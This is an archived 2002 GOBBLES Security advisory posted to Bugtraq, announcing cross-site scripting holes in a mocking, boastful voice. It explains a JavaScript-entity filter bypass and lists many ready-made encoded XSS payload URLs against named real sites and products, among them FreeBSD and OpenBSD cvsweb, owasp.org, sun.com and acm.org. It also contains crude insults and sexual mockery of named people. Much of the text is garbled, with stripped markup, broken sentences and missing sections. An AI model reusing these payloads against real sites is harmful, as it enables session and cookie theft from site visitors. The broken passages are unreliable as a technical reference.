From: gobbles@hushmail.com
Sent: Monday, May 06, 2002 9:35 AM
To: bugtraq@securityfocus.com
Cc: vulnwatch@vulnwatch.org
Subject: [VulnWatch] ALERT! MAJOR SITES/PRODUCTS VULNERABLE TO *NEW* CSS
ATTACK ALERT!
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
We saw the Administrivia post today, so we decided to send this in. Hopefully it's not too late.
The post mentioned that new forms of cross-site scripting attacks would be accepted. Well, as you'll see, we have some nifty tricks that are discussed, and also some major products are totally torn apart.
Most of the sites allow you to download their custom scripts (e.g. man.cgi) so we believe we are justified in giving examples of sites that are affected, especially since this has been the norm on the security lists for a while now.
Thanks to all the administrators who were good sports over this.
GOBBLES SECURITY
http://www.bugtraq.org/
GOBBLES@hushmail.com
GOBBLES SECURITY ADVISORY #33
Compass, Square, and Slide-rule
New Generation CSS
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
############################################################################
# #
# CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS #
# #
# #
############################################################################
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
I'm over it
You see I'm falling in the fast abyss
Clouded by memories of the past
At last I see
I hear it fading, I can't speak it
Oh yes you will dig my grave
You feeling, finding, always whining
Take my hand now be alive
You see I cannot be forsaken
Because I'm not the only one
We walk amongst you feeding, raping
Must we hide from everyone?
Before we begin, we'd like to mention that recently we've been overwhelmed
with emails from journalists asking us questions about our security group.
GOBBLES like this very much because it is sign of his crew becoming very
famous and ubiquitous. We be accused of seeking fame and job offers. To this
GOBBLES say no, we not after job offers, but yes, we after as much fame and
attention as possible and this is why we will be disclosing more serious
remote vulnerabilities in OS like Solaris and IRIX in near future. Remote
exploit for IRIX can then be complemented with upcoming GOBBLES IRIX
backdoor.
Current misinterpretation about what GOBBLES mean when he say he group
seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of
non-disclosure and is being sarcastic. This is wrong, disclosure of
rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current
development project 'lestat' for another default RPC service in Solaris is
leading to further proof that GOBBLES is avid supporter of full-disclosure,
especially because it great way to annoy as many Fascists, Communists, and
McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is
becoming as famous as possible.
We now co-existing with Bugtraq, making the peace, being ethical, etc. For
those interested in learning more about the hacker ethics of GOBBLES
Security, please see the comprehensive articles written by RLoxley on the
subject. He is a very fine man and, just as every crowd needs its pogo stick
expert, he has selected ethics as his niche. And what a great job he has
done. GOBBLES recommend having a look at #hackphreak on undernet where you
can share hacking tips with fellow hackers, bask in the presence of GPL
hippies, and just meet up with all those elite dudes who have spiffy HTML on
their websites.
BACKGROUND
==========
Been a lot of fanfare about cross-site scripting in recent times. Person
suggest changing acronym from CSS to XSS so it different from Cascading
Style Sheets, but this not really good move because XSS conflict with XML
Security Suite from IBM (they company who make computer systems, probably
not big fans of stem cell research HEHEHEHEHEHEHEHE).
When GOBBLES Security first dreamed of the CSS technique, pioneered it,
refined it, and perfected it, we knew of the dastardly tool of mass
destruction that had just materialized. Here was something that could make
Joe Average a security expert, something that could be wielded by the little
guy to sting and subdue the domineering commercial bullies. A well-planted
CSS attack can undermine the reputation of even the most stringent
corporations, thus making it one of the most effective political tools known
in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology
Group, and the Achilles Heel of the infosec world.
See the recent CSS attack on Steve-do-me-raw-Gibson's grc.com as witnessed
on Bugtraq for an example of the effective political power this technique
possesses.
The cross-site scripting attack is the hallmark of the Vuln-Dev mailing
list. We understand that a screen local and an rpc.rwalld remote are pale in
comparison to the cross-site scripting attack, which is why we don't carry
any grudges against The Blue Boar for moderating us.
INNOVATIVE CSS TECHNIQUES
=========================
* JavaScript entities
- ---------------------
Only hotmail security historians like those at GOBBLES Security know of
obscure feature in JavaScript language that make it easy to bypass thing
like "<...>", "", and "javascript:" filter for CSS
attack using JavaScript. That is thing called JavaScript entity. Like...
&{alert('GOBBLES')};
When url-encoded become...
%26%7balert%28%27GOBBLES%27%29%7d%3b
The beauty of this technique for the adorned CSS exploiter is that the
GOBBLES CSS JavaScript Entity can appear almost anywhere with good results.
Note that "CERT" page below make no mention of this at all and even say that
ampersand is not relied upon by current exploits. Well, now it is.
http://www.cert.org/tech_tips/malicious_code_mitigation.html
For reference, HTML4 specification only require you to encode the following:
; %3b
/ %2f
? %3f
: %3a
@ %40
= %3d
& %26
< %3c
> %3e
" %22
# %23
% %25
{ %7b
} %7d
| %7c
\ %5c
^ %5e
~ %7e
[ %5b
] %5d
` %60
Until now, that encoding information was private knowledge of the
underground. GOBBLES is about information dissemination and believe
information wants to be free, though. So really GOBBLES see no need why he
should have to justify the disclosure of the encoding techniques. If GOBBLES
didn't do it, someone would have, and it best this come from a whitehat
retard than from someone making the big dollar.
Sometimes in URLs below we can't encode parameter, but this no problem for
GOBBLES because smart thing to do is just not enter the character encoded,
i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>'
does not get entered as '%3e'. Why? Because sometimes in URLs below we can't
encode parameter.
* HTML string completion / HTML closure
- ---------------------------------------
Principles are basically identical to SQL injection technique. Doesn't need
much coverage since it pretty obvious to anyone with rational mind. GOBBLES
will let "CERT" write a dissertation on it. Essentially...
*** HTML string completion:
Make $user_provided: " attribute="malicious_data
Then original text becomes
Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick,
etc. But can just use common attribute like 'id' and just insert GOBBLES CSS
JavaScript Entity.
*** HTML closure:
Make $user_provided: ">
Then original text becomes
">
Good way to introduce /
OR
http://thttpd-site/cgi-bin/ssi//
Note that it doesn't decode url-encoding, you may have mixed results using
spacing in the URL, and the default /
http://www.happyhacker.org/cgi-bin/ssi/%3cp+align%3D%26%7balert%28%27GOBBLES%27
%29%7d%3b%3e
Both were tested against the latest stable version of thttpd from...
http://www.acme.com/software/thttpd/thttpd-2.20c.tar.gz
... so this time the developer can't downplay the findings of the GOBBLES
Security Research Organization like he did with our theoretically
exploitable off-by-one, nor can he invent fake CHANGELOG entries (google
cache catch you out there my friend).
3. thievco.com / Matt Wright's guestbook script
- -----------------------------------------------
Hehehehehehehehe, GOBBLES to this day still don't know what is funnier:
GOBBLES writing advisory on local filesystem feature of lynx in awhttpd
advisory, or The Blue Boar allowing it to pass unhindered to Vuln-Dev. Of
course, nowadays, The Blue Boar refuses to allow any of our advisories
through, since it's probably easier to err on the side of caution when you
can't read C code ;).
GOBBLES regularly visit The Blue Boar's website in search of hacking
information, so it incumbent upon GOBBLES to alert world to presence of
cross-site scripting hole in The Blue Boar's website and, more importantly,
in Matt Wright's guestbook script.
Matt Wright's guestbook script can be found at:
http://worldwidemart.com/scripts/guestbook.shtml
To he credit, he has $allow_html variable that can strip "<...>" stuff, but
once again, GOBBLES trademarked JavaScript Entity CSS Technique come to the
rescue. Incidentally, The Blue Boar allows html in his guestbook fields, but
as we just said, the presence of this does not determine whether or not we
can use our CSS technique. We always can.
if ($FORM{'url'}) {
print GUEST "$FORM{'realname'}";
}
You see, even if html form do not have 'url' parameter, remote attacker can
still create their own local html form pointing at The Blue Boar's website
or some other site with Matt Wright's guestbook script. This permits them to
inject malicious data via 'url' parameter that will allow CSS attacks on
anyone viewing the guestbook.
Script can only be called with POST method, so it can't be linked to, but
this is moot point because with permanent malicious CSS data in actual
guestbook, attacker can just drop it there and leave, knowing that if site
store authentication information in cookies or whatever, anyone viewing
guestbook with JavaScript enabled will be slain by malicious code in
attacker guestbook entry.
This is obviously a very devastating vulnerability. CSS hole are sometimes
overlooked, but luckily in this world there are security masterminds with a
razor sharp logic -- they miss nothing. These masterminds are your only
salvation. Without their marvellous creativity and insight, the Internet
would be a very scary place indeed.
Hereeeeeeeeeeeeeeeeeeeeeee's Johnnnnnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy!
4. antionline.com / fatelabs.com / vbulletin php package
- --------------------------------------------------------
There are tons of bugs in the latest version of this package. It's
commercial, so you can only download a Lite version, but GOBBLES have a
network of contacts in the warez scene and was able to obtain both the
version 2.0.3 that Antionline is built on and the latest version.
Antionline switched from PERL to PHP last year. John Vranesevich can't code,
let alone write secure code, so he forced to experiment with external
scripts and such. Not a good selection he has made, because right now
GOBBLES have script that can ethically hack John Vranesevich's site in 5-10
seconds.
Only interested in CSS bugs here, though.
The bug is like vbulletin cross-site scripting hole revealed here:
http://online.securityfocus.com/archive/1/263609/2002-05-01/2002-05-07/0
But big difference is that GOBBLES CSS JavaScript Entity Technique and the
other techniques mentioned above make many, many, many more portions of the
code vulnerable.
Examples:
http://www.antionline.com/mod/index.php?redirect=&{alert('GOBBLES')};
http://forums.fatelabs.com/mod/index.php?redirect=&{alert('GOBBLES')};
Looking at HTML source show how GOBBLES CSS Javascript Entity can appear
anywhere in attribute value, which make it very flexible.
>>>>>. GOBBLES
know all the techniques: crazy monkey, sendmail, bind!
y0 st0p fuqn w1t k3v1n'z r1ghtz. h3 1z a hum4n b31ng U kn0. u b4st4rdz m4y
t4k3 aw4y h1z h4m r4d10 r1ghtz, but u w1ll n3v3r t4k3 aw4y h1z s3cur1tyf0cus
j0urn4l1zm r1ghtz, h1z t43 b0 r1ghtz, 0r h1z r1ght t0 w34r p1nk l1ng3r13
w1th a b4n4n4 up h1z chut3.
11. nessus.org / freebsd.org / cvsweb
- -------------------------------------
http://cgi.nessus.org/cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
http://www.freebsd.org/cgi/cvsweb.cgi/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
Hehehe, and a Theo bonus:
http://www.openbsd.org/cgi-bin/cvsweb/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
12. owasp.org
- -------------
http://owasp.org/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
These guys like to write all about web security, including cross-site
scripting attacks. You can read about it here:
http://www.owasp.org/asac/input_validation/css.shtml
13. whitehats.com
- -----------------
http://www.whitehats.com/cgi/arachNIDS/Search?search=&{alert('GOBBLES')};
That just an example of dozens of CSS holes found on the whitehats website
in different scripts, including the forums. Hasn't been updated for a few
months because Max Vision serving prison sentence for ./NXT'ing nameservers.
When he get out we will send him email informing him of all the CSS and
command execution bugs GOBBLES found on his website. GOBBLES appreciate work
of Max Vision in the community; we make heavy use of his BIND9 fingerprint
techniques and he keep a great database of signatures for snort that let us
know when we've been owned.
14. ciac.org / nfr.com / webglimpse
- -----------------------------------
From ciac:
http://www.ciac.org/cgi-bin/webglimpse/www/htdocs/ciac/archive?query=%3cp+align
%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
http://hoaxbusters.ciac.org/cgi-bin/webglimpse-hoaxbusters/www/hoaxbusters/
archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
From nfr:
http://www.nfr.com/cgi-bin/nfrsearch?query=hehehe&id=2&whole=%26%7balert%28
%27GOBBLES%27%29%7d%3b
15. cerias.purdue.edu
- ---------------------
http://www.cerias.purdue.edu/search/results.php?search=%3cp+align%3D%26
%7balert%28document.location%29%7d%3b%3e
This script strip the single quotes, but any web puppy can get around this.
TEAM GOBBLES in a hurry to meet closing Bugtraq CSS deadline so we couldn't
check all scripts on this site, but because we fans of this site, we sent
administrator an email pointing out the problems and telling him where he
can find further information:
"pp. 544-547 of book _Practical Unix & Internet Security_ describe CGI
weakness in detail and you well-advised to purchase a copy of this book.
GOBBLES have this book on he shelf and wouldn't be what he is today if he
didn't read this amazing piece of literary accomplishment."
16. infowar.com
- ---------------
http://www.infowar.com/search/search_results.cfm?term1=
There also several remote command execution vuln on Winny site. He been
notified.
17. grc.com
- -----------
http://grc.com/x/ne.dll?
Hehehe, hi Steve, you studmuffin hehehehehehe ;>
18. acm.org
- -----------
http://campus.acm.org/public/search/results.cfm?query=%3C%2F
textarea%3E%3Cp+align%3D%26%7Balert%28%27GOBBLES%27%29%7D%3B
This good example of HTML closure technique, i.e. using to break
out of one opened already and then busting cross-site scripting move in
regular fashion.
19. security.nnov.ru
- --------------------
http://security.nnov.ru/search/exploits.asp?keyword=&{alert('GOBBLES')};
GOBBLES certain he found this one before 3APA[...]A hehehehehe ;).
20. sun.com
- -----------
http://sunsolve.sun.com/pub-cgi/show.pl?target=%26%7balert%28%27GOBBLES%27
%29%7d%3b
Hehehehehe, 2+ default RPC remote root vulns coming to Bugtraq *VERY* soon.
GOBBLES will be making the exploits very easy to use this time, because we
had a lot of emails concerning rpc.rwalld from HotBabe, LinuxGal, etc.
saying rpc.rwalld impossible to use.
FINAL WORDS
===========
We have ethically disclosed CSS holes in a number of sites by co-existing
with Bugtraq and spreading the full-disclosure faith. We have also shared a
few nuggets of information with the community we love. Because of the
relatively low risk of the attack -- to say the least -- GOBBLES didn't find
it necessary to inform all of the administrators. And in certain respects,
GOBBLES think it really makes little difference to the security of the above
sites anyway...
Remember: all of the above sites are UNSAFE TO VISIT from untrusted
websites, and some are even unsafe to visit directly with scripting enabled
in your browser.
There are many self-proclaimed CSS experts out there who will litter your
inbox with their daily CSS discoveries, but there can only be one CSS king,
and that king is GOBBLES. Don't accept any imitations.
Sleep well, my friends.
Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAjzWh9AVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPa/wA
n2wWZrqhxsbUMs60FGZPgMRBDfr/AJ9oUFHCXgGKWlKFMMv8Zbt/+3HM2Q==
=DvEB
-----END PGP SIGNATURE-----